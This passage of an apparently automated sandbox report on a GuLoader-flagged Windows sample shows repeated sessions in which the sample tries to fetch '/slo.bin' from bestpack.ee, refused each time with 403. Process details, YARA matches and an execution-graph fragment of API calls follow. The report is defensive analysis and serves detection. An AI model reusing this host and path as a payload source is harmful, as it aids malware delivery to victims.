                                                                                                                      28192.168.11.2049817185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:04:06 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:04:07 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:07 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:04:07 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.11.2049819185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:04:18 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:04:18 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:18 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:04:18 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.11.2049821185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:04:29 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:04:30 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:30 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:04:30 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      31192.168.11.2049823185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:04:41 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:04:41 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:41 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:04:41 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      32192.168.11.2049825185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:04:52 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:04:52 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:04:52 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:04:52 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      33192.168.11.2049827185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:05:03 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:05:04 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:04 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:05:04 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      34192.168.11.2049829185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:05:15 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:05:15 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:15 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:05:15 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      35192.168.11.2049831185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:05:26 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:05:26 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:26 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:05:26 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.11.2049833185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:05:37 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:05:38 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:38 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:05:38 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.11.2049835185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:05:49 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:05:49 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:05:49 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:05:49 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.11.2049837185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:06:00 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:06:00 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:00 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:06:00 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.11.2049839185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:06:11 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:06:12 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:12 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:06:12 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      40192.168.11.2049841185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:06:23 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:06:23 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:23 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:06:23 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      41192.168.11.2049843185.86.211.1374436976C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-09-27 17:06:34 UTC187OUTGET /slo.bin HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: bestpack.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-09-27 17:06:34 UTC163INHTTP/1.1 403 Forbidden
                                                                                                                      Date: Fri, 27 Sep 2024 17:06:34 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 83
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      2024-09-27 17:06:34 UTC83INData Raw: 3c 63 65 6e 74 65 72 3e 3c 62 72 20 2f 3e 3c 62 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 62 3e 3c 62 72 20 2f 3e 57 57 57 20 41 63 63 65 73 73 20 62 6c 6f 63 6b 65 64 20 2d 20 62 61 64 20 71 75 65 72 79 2f 75 72 6c 3c 2f 63 65 6e 74 65 72 3e
                                                                                                                      Data Ascii: <center><br /><b>403 Forbidden</b><br />WWW Access blocked - bad query/url</center>


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:12:58:09
                                                                                                                      Start date:27/09/2024
                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:559'533 bytes
                                                                                                                      MD5 hash:09646B466D4203F0A605120C10248654
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.72566552229.0000000006D62000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:12:58:37
                                                                                                                      Start date:27/09/2024
                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:559'533 bytes
                                                                                                                      MD5 hash:09646B466D4203F0A605120C10248654
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.76719471404.0000000003592000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:19.1%
                                                                                                                        Dynamic/Decrypted Code Coverage:13.5%
                                                                                                                        Signature Coverage:18.5%
                                                                                                                        Total number of Nodes:1603
                                                                                                                        Total number of Limit Nodes:40
                                                                                                                        execution_graph 5292 70591058 5294 70591074 5292->5294 5293 705910dd 5294->5293 5295 70591092 5294->5295 5305 705915b6 5294->5305 5297 705915b6 GlobalFree 5295->5297 5298 705910a2 5297->5298 5299 705910a9 GlobalSize 5298->5299 5300 705910b2 5298->5300 5299->5300 5301 705910c7 5300->5301 5302 705910b6 GlobalAlloc 5300->5302 5304 705910d2 GlobalFree 5301->5304 5303 705915dd 3 API calls 5302->5303 5303->5301 5304->5293 5307 705915bc 5305->5307 5306 705915c2 5306->5295 5307->5306 5308 705915ce GlobalFree 5307->5308 5308->5295 5309 402643 5310 402672 5309->5310 5311 402657 5309->5311 5312 4026a2 5310->5312 5313 402677 5310->5313 5314 402d89 21 API calls 5311->5314 5316 402dab 21 API calls 5312->5316 5315 402dab 21 API calls 5313->5315 5324 40265e 5314->5324 5317 40267e 5315->5317 5318 4026a9 lstrlenW 5316->5318 5326 406543 WideCharToMultiByte 5317->5326 5318->5324 5320 402692 lstrlenA 5320->5324 5321 4026ec 5322 4026d6 5322->5321 5323 4060c3 WriteFile 5322->5323 5323->5321 5324->5321 5324->5322 5325 4060f2 5 API calls 5324->5325 5325->5322 5326->5320 4538 401946 4539 401948 4538->4539 4540 402dab 21 API calls 4539->4540 4541 40194d 4540->4541 4544 405c2d 4541->4544 4583 405ef8 4544->4583 4547 405c55 DeleteFileW 4549 401956 4547->4549 4548 405c6c 4550 405d97 4548->4550 4597 406521 lstrcpynW 4548->4597 4550->4549 4557 40687e 2 API calls 4550->4557 4552 405c92 4553 405ca5 4552->4553 4554 405c98 lstrcatW 4552->4554 4598 405e3c lstrlenW 4553->4598 4555 405cab 4554->4555 4558 405cbb lstrcatW 4555->4558 4560 405cc6 lstrlenW FindFirstFileW 4555->4560 4559 405db1 4557->4559 4558->4560 4559->4549 4561 405db5 4559->4561 4562 405d8c 4560->4562 4565 405ce8 4560->4565 4615 405df0 lstrlenW CharPrevW 4561->4615 4562->4550 4568 405d6f FindNextFileW 4565->4568 4576 405c2d 64 API calls 4565->4576 4578 4055a6 28 API calls 4565->4578 4581 4055a6 28 API calls 4565->4581 4602 406521 lstrcpynW 4565->4602 4603 405be5 4565->4603 4611 4062e1 MoveFileExW 4565->4611 4566 405be5 5 API calls 4569 405dc7 4566->4569 4568->4565 4570 405d85 FindClose 4568->4570 4571 405de1 4569->4571 4572 405dcb 4569->4572 4570->4562 4574 4055a6 28 API calls 4571->4574 4572->4549 4575 4055a6 28 API calls 4572->4575 4574->4549 4577 405dd8 4575->4577 4576->4565 4579 4062e1 40 API calls 4577->4579 4578->4568 4580 405ddf 4579->4580 4580->4549 4581->4565 4618 406521 lstrcpynW 4583->4618 4585 405f09 4619 405e9b CharNextW CharNextW 4585->4619 4588 405c4d 4588->4547 4588->4548 4589 4067cf 5 API calls 4595 405f1f 4589->4595 4590 405f50 lstrlenW 4591 405f5b 4590->4591 4590->4595 4592 405df0 3 API calls 4591->4592 4594 405f60 GetFileAttributesW 4592->4594 4593 40687e 2 API calls 4593->4595 4594->4588 4595->4588 4595->4590 4595->4593 4596 405e3c 2 API calls 4595->4596 4596->4590 4597->4552 4599 405e4a 4598->4599 4600 405e50 CharPrevW 4599->4600 4601 405e5c 4599->4601 4600->4599 4600->4601 4601->4555 4602->4565 4625 405fec GetFileAttributesW 4603->4625 4606 405c12 4606->4565 4607 405c00 RemoveDirectoryW 4609 405c0e 4607->4609 4608 405c08 DeleteFileW 4608->4609 4609->4606 4610 405c1e SetFileAttributesW 4609->4610 4610->4606 4612 406302 4611->4612 4613 4062f5 4611->4613 4612->4565 4628 406167 4613->4628 4616 405dbb 4615->4616 4617 405e0c lstrcatW 4615->4617 4616->4566 4617->4616 4618->4585 4620 405eb8 4619->4620 4623 405eca 4619->4623 4622 405ec5 CharNextW 4620->4622 4620->4623 4621 405eee 4621->4588 4621->4589 4622->4621 4623->4621 4624 405e1d CharNextW 4623->4624 4624->4623 4626 405bf1 4625->4626 4627 405ffe SetFileAttributesW 4625->4627 4626->4606 4626->4607 4626->4608 4627->4626 4629 406197 4628->4629 4630 4061bd GetShortPathNameW 4628->4630 4655 406011 GetFileAttributesW CreateFileW 4629->4655 4632 4061d2 4630->4632 4633 4062dc 4630->4633 4632->4633 4635 4061da wsprintfA 4632->4635 4633->4612 4634 4061a1 CloseHandle GetShortPathNameW 4634->4633 4636 4061b5 4634->4636 4637 40655e 21 API calls 4635->4637 4636->4630 4636->4633 4638 406202 4637->4638 4656 406011 GetFileAttributesW CreateFileW 4638->4656 4640 40620f 4640->4633 4641 40621e GetFileSize GlobalAlloc 4640->4641 4642 406240 4641->4642 4643 4062d5 CloseHandle 4641->4643 4657 406094 ReadFile 4642->4657 4643->4633 4648 406273 4651 405f76 4 API calls 4648->4651 4649 40625f lstrcpyA 4650 406281 4649->4650 4652 4062b8 SetFilePointer 4650->4652 4651->4650 4664 4060c3 WriteFile 4652->4664 4655->4634 4656->4640 4658 4060b2 4657->4658 4658->4643 4659 405f76 lstrlenA 4658->4659 4660 405fb7 lstrlenA 4659->4660 4661 405f90 lstrcmpiA 4660->4661 4662 405fbf 4660->4662 4661->4662 4663 405fae CharNextA 4661->4663 4662->4648 4662->4649 4663->4660 4665 4060e1 GlobalFree 4664->4665 4665->4643 4669 4015c6 4670 402dab 21 API calls 4669->4670 4671 4015cd 4670->4671 4672 405e9b 4 API calls 4671->4672 4686 4015d6 4672->4686 4673 401636 4675 401668 4673->4675 4676 40163b 4673->4676 4674 405e1d CharNextW 4674->4686 4679 401423 28 API calls 4675->4679 4694 401423 4676->4694 4685 401660 4679->4685 4683 40164f SetCurrentDirectoryW 4683->4685 4684 40161c GetFileAttributesW 4684->4686 4686->4673 4686->4674 4686->4684 4688 405aec 4686->4688 4691 405a75 CreateDirectoryW 4686->4691 4698 405acf CreateDirectoryW 4686->4698 4689 406915 5 API calls 4688->4689 4690 405af3 4689->4690 4690->4686 4692 405ac1 4691->4692 4693 405ac5 GetLastError 4691->4693 4692->4686 4693->4692 4695 4055a6 28 API calls 4694->4695 4696 401431 4695->4696 4697 406521 lstrcpynW 4696->4697 4697->4683 4699 405ae3 GetLastError 4698->4699 4700 405adf 4698->4700 4699->4700 4700->4686 5327 401c48 5328 402d89 21 API calls 5327->5328 5329 401c4f 5328->5329 5330 402d89 21 API calls 5329->5330 5332 401c5c 5330->5332 5331 401c71 5334 401c81 5331->5334 5335 402dab 21 API calls 5331->5335 5332->5331 5333 402dab 21 API calls 5332->5333 5333->5331 5336 401cd8 5334->5336 5337 401c8c 5334->5337 5335->5334 5338 402dab 21 API calls 5336->5338 5339 402d89 21 API calls 5337->5339 5340 401cdd 5338->5340 5341 401c91 5339->5341 5342 402dab 21 API calls 5340->5342 5343 402d89 21 API calls 5341->5343 5344 401ce6 FindWindowExW 5342->5344 5345 401c9d 5343->5345 5348 401d08 5344->5348 5346 401cc8 SendMessageW 5345->5346 5347 401caa SendMessageTimeoutW 5345->5347 5346->5348 5347->5348 5356 4028c9 5357 4028cf 5356->5357 